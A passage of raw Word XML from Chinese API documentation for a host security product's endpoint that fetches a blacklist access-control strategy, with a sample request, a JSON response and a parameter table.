          <w:p w14:paraId="524E0AE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1704A22D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27CE478E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F9BD6B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F5CB329" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525226ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/black-strategy/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detail?id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=111111</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC35D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D99D6CA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": "629dbf65c56dd50d10c9a984",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strategyName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "新建黑名单-20220606164812",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstRealmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstGroups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>groupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 9,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"name": "l15a29a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"description": "l15a29a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "全部标签",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tagColor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstIpRanges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstAgentSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstAgentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dstIpName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcRealmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcGroups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcIpRanges</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcAgentSize</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcAgentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["628f27265aa65cab", "628f272b5aa65cac"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcIpName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "10.106.24.32",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"ports": ["7788"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"protos": ["TCP"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"status": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>updateTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1654505570177,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>optUsername</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jjw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayDstIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displaySrcIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "7788",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>switchStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"operation": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D1D5E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回rows部分说明：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1563"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="5666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3EB9671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A06F20E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4780CA58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32DF61D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="41F00516" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69B401F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="39BB63AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64EBB79E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="202CA586" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FFFEAEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>strategyName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07E40F9E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5337D67F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FE1A0FA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BD6C1EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstRealmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28DA5613" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B24DA90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问者范围，1:业务组、标签，2:自定义主机，3：自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="084100AD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DE9686A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstGroups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E57A34A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03204699" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="13E63758" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C39CF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstTags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B691EA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AC9343E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2126C165" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01E5F886" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstIpRanges</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E7BE014" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21505056" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问者</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="68A1F247" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66D60479" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>dstAgentSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B768C6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DF5C561" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机数量</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="032C6E2D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27D8780B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstAgentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36820734" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="355B1B20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63871226" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A8B55C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dstIpName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E661A7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E133FE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>被访问主机</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29CA4087" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FD03377" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcRealmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01533925" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70C3FCE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问者范围，1:业务组、标签，2:自定义主机，3：自定义</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0A76F591" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F1A3DCE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>srcGroups</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CC1DB9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7412A5FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B6ED5A1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B76B8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
